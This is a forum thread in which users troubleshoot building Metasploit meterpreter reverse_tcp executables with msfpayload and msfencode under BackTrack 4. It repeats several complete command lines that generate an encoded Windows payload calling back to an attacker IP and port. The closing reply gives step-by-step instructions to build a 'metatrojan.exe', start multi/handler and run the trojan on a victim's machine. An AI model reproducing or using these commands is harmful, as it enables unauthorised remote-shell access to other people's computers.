.i'm trieing to look back at the phoenix910 post, it's about encoding the payload ,meterpreter reverse_tcp and executing it on the victime box
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe
.no problem with bt3 and ./msfencode .the output.exe works fine ,and the victim connect back
.but the same output.exe that was encoded on the bt4 pre, same command used, it's not working!
.in the first place i thought it was some problem with the nat or some iptables rulez .but i run packetyzer on the victim box and no packets has been sent, no connection tried
.tried with updated msf but no good.
.the funny part is ,that the old output.exe that was encoded on a bt3 works on the victim box and connect back to bt4pre, with multi/handler started ,with the options set (LHOST=192.168.1.2 LPORT=5555)
.that could be the problem with the encoder or something, maybe ruby lib.s
.is there someone who managed to use ./msfencode successfully, on bt4pre? .to get the working executible file.
.i'll be thankfull for any response ,'cause i tried with the outher encoders supported my msf, but no results
./msfpayload windows/meterpreter/reverse_tcp LHOST=18.104.22.168 LPORT=4444 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /revpayload.exe
.ecsployt thank's for the replay .it's a good combinations, but i still got the same problem .hm not the same exactly 'cause i menaged to encode the working output.exe but after 100 atemps
.useing the very same command on the livecd on the vmware .it's so confusing couse i install the bt from that livecd after the success and when i tried again to make working exe ,no good it's not working .then i tried to boot form livecd again and do the same thing .it's not working !
.i tried so many things .reinstalling ruby framework bt, booting from iso, livecd etc. ( X > output.exe without encoder, nothing)
And all i can make up with is that this is some kind of problem related with wmware. It is little frustrating cause i was working on this for 5days and resolts are 'in most casess encoded output.exe is not working but u can reboot and try again'
.I don't wana be boring, maybe i's time for me to make a new settup on my box, reinstall vmware...
.so if anyone has a extra minut to try... help
I'm not sure what your problem may be. If your thinking about reinstalling bt4pre to a virtual machine, why dont you try virtual box instead. I'm using that, and it's really good. And open source. The added tools install without a problem to bt4pre as well.
Sorry i can't be of more help.
.this is just crazy!!!
.yesterday i remove my destkop distro and install BT-pre on my box .why not, it's a full distro now and i'm spendig so much time on it .everthing works just fine
.i have vmware 6.5.2 now on bt
.6.5.0 was on my last distro
.but, guess what ??
First thing i did was .lunching vmware, install xpsp1 and xpsp2 and boot the bt-pre under vmware .i just couldn't wait to see the line "meterpreter>"
.f*k !!!!!!!! the output.exe encoded on bt4-pre (running under vmware) ,is not working!!! something is wrong here.
.i encode the same one on my desktop bt4-pre ,main distro now (vmware is running on it)
.it's working and i get my daily dose of meterpreter
.well i'm gone try to run those not working exe in the presence of debugger and see what the hell is wrong with them
Starting every sentence with a period does not speak well for you computer skills.
.well i'm working onto improve my computer skills .so pureh@te ,really appreciate your help
try fast-track... there is a option to create the executable with fast track. by default msfpayload uses shakanaga encoder unless if told other wise...
search threw my resent post, i posted lots of info on this subject and a few others contributed to the thread...
BT4? Do it like this under root:
./msfpayload windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] R | ./msfencode -e x86/fnstenv_mov -t exe > metatrojan.exe
Run multi/handler, and set payload as windows/meterpreter/reverse_tcp. And then execute the trojan on the victim's machine, it should connect.